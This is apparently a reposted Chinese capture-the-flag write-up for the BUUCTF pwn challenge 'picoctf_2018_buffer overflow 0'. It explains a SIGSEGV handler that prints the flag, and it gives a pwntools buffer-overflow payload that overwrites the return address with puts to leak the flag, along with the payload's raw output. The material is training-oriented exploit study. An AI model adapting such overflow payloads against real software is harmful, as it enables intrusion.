來查看信號函數(shù)代表的含義:

11是 SIGSEGV，表示對存儲的無效訪問
點進去sigsegv_handler
同時將flag的值賦予了stderr

現(xiàn)在知道那個信號函數(shù)的作用是:

當發(fā)生 對存儲的無效訪問時,會把stderr打印輸出,即將flag的值打印輸出

再往下有個 vuln函數(shù)

有兩種解題方式

方法一:

經(jīng)過前面的分析,我們知道了當發(fā)生了對 內(nèi)存存儲無效的訪問會將flag打印出來

首先ssh鏈接,輸入密碼后

方法二:將ret覆蓋成put，然后輸出flag地址上的值,

from pwn import * elf = ELF("./PicoCTF_2018_buffer_overflow_0") payload = 'a' * (0x18 + 4) + p32(elf.plt['puts']) + p32(0) + p32(0x0804A080) print("payload : " + payload)

得到了一串值 aaaaaaaaaaaaaaaaaaaaaaaaaaaa��\x04\x00\x00\x80\xa0\x04

總結(jié)

以上是生活随笔為你收集整理的BUUCTF--pwn picoctf_2018_buffer overflow 0的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。